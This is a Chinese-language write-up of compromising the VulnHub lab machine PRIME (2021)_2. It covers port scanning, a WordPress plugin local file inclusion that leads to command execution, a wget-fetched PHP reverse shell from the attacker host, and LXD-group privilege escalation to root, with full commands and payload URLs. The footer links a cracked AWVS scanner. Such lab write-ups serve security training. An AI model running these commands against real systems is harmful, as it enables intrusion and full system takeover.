主機資訊
kali: 192.168.254.165
PRIME (2021)_2:192.168.254.166
資訊收集
通過nmap掃描目标主機發現開放22、80、139、445、10123端口,并且10123使用python搭建http
nmap -T4 -A -v -p- 192.168.254.166
打開80端口的頁面發現是一個介紹頁面
檢視源碼也沒有發現有價值的資訊
通路10123端口發現應該是某個使用者的家目錄
我們将所有檔案下載下傳下來進行檢視
在something檔案中發下一些提示
通過目錄掃描發現一個wordpress的站點和一個server目錄
檢視wp目錄
檢視server目錄
下載下傳server目錄下的檔案,解壓後發現是一套網站的源碼
使用wpscan得到一個使用者名admin
wpscan --url http://192.168.254.166/wp/ --enumerate
在使用wpscan api-token後再次進行掃描發現存在一個LFI漏洞
wpscan --url http://192.168.254.166/wp/ -e --api-token CPW3*********************************ZkfaXk
利用方法
檢視passwd
view-source:http://192.168.254.166/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd
GETSHELL
然後通路最開始在10123端口中發現的shell.php檔案,并且可以執行指令
http://192.168.254.166/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../home/jarves/upload/shell.php&cmd=id
使用shell.php執行指令将反彈shell的檔案下載下傳到目标主機
http://192.168.254.166/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../home/jarves/upload/shell.php&cmd=wget%20http://192.168.254.165:8888/php_re_shell.php%20-O%20/tmp/shell.php
使用php執行上傳的檔案反彈回一個shell
http://192.168.254.166/wp/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../home/jarves/upload/shell.php&cmd=php%20/tmp/shell.php
使用python擷取一個互動式shell
python3 -c 'import pty; pty.spawn("/bin/bash");'
檢視wordpress的配置檔案得到資料庫密碼
使用nume4linnux對smb進行掃描發現一個share
enum4linux -A 192.168.254.166
使用smbclient進行連接配接
smbclient //192.168.254.166/welcome
建立ssh公鑰
ssh-keygen -b 2048
将id_rsa.pub複制到tmp目錄下命名位authorized_keys
将authorized_keys上傳到目标主機的.ssh目錄下
然後使用ssh登入到目标主機
檢視使用者id發現jarves還屬于lxd組
首先我們從github下載下傳建構好的Alpine,然後進行執行
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
提權
然後我們将生成的檔案上傳至目标機器
wget http://192.168.254.165:8889/alpine-v3.13-x86_64-20210529_0640.tar.gz
使用lxd進行初始化
lxd init
然後導入鏡像
lxc image import ./alpine-v3.13-x86_64-20210529_0640.tar.gz --alias myimage
檢視鏡像
lxc image list
進入到容器的指令行
lxc init myimage ignite -c security.privileged=true
lxc config device add ignite mydevice disk source=/ path=/mnt/root recursive=true
lxc start ignite
lxc exec ignite /bin/sh
進入mnt/root目錄,這個目錄包含所有主控端檔案
替換root目錄下的authorized_keys檔案
最後使用ssh連接配接拿到root權限
加入我的星球
下方檢視曆史文章
VulnHub之DC-1
VulnHub之DC-2
VulnHub之DC-3
VulnHub之DC-4
VulnHub之MuzzyBox
【工具分享】AWVS 12 漢化破解版
通達OA任意上傳&檔案包含漏洞複現
掃描二維碼
擷取更多精彩
NowSec